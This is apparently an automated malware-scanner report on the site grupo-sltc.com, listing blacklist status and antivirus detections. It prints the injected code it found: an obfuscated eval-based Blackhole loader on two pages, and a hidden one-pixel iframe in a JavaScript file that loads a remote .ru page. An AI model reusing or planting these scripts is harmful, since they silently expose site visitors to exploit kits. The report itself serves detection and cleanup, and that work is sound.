New scan:

Malware Scanner report for grupo-sltc.com

Malicious/Suspicious/Total urls checked
3/0/4
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "grupo-sltc.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=grupo-sltc.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://grupo-sltc.com/
200 OK
Content-Length: 5387
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6e,0x67,0x6e,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a
... 1690 bytes are skipped ...
x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6e,0x67,0x6e,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x72,0x6e,0x67,0x6e,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");h=2;s="";for(i=0;i-480!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}

Antivirus reports:

Comodo
TrojWare.JS.BlacoleRef.CQ

http://grupo-sltc.com/AC_RunActiveContent.js
200 OK
Content-Length: 11947
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


(function () { var nud = document.createElement('iframe'); nud.src = 'http://vezylgys.ru/count10.php'; nud.style.position = 'absolute'; nud.style.border = '0'; nud.style.height = '1px'; nud.style.width = '1px'; nud.style.left = '1px'; nud.style.top = '1px'; if (!document.getElementById('nud')) { document.write('<div id=\'nud\'></div>'); document.getElementById('nud').appendChild(nud); }})();

Antivirus reports:

AntiVir
JS/BlacoleRef.CL.142
Avast
JS:Iframe-AHV [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.DBR
TrendMicro-HouseCall
JS_BLACOLE.SMJF
Emsisoft
Trojan.JS.Iframe.DBR (B)
Comodo
TrojWare.JS.Iframe.SO
TrendMicro
JS_BLACOLE.SMJF
Kaspersky
Trojan.JS.Redirector.yc
Microsoft
Trojan:JS/BlacoleRef.CL
Fortinet
JS/Redir.BBEQ!tr
NANO-Antivirus
Trojan.Script.Iframe.bcslpm
F-Secure
Trojan.JS.Iframe.DBR
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Iframe.SL
GData
Trojan.JS.Iframe.DBR
Commtouch
JS/IFrame.RS.gen
BitDefender
Trojan.JS.Iframe.DBR

http://grupo-sltc.com/home.html
200 OK
Content-Length: 5203
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6e,0x67,0x6e,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a
... 1690 bytes are skipped ...
x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6e,0x67,0x6e,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x72,0x6e,0x67,0x6e,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");h=2;s="";for(i=0;i-480!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}

Antivirus reports:

Comodo
TrojWare.JS.BlacoleRef.CQ

http://grupo-sltc.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: grupo-sltc.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 20:05:26 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 5387
Content-Type: text/html; charset=ISO-8859-1

...5387 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: grupo-sltc.com
Referer: http://www.google.com/search?q=grupo-sltc.com

Result:
The result is similar to the first query. There are no suspicious redirects found.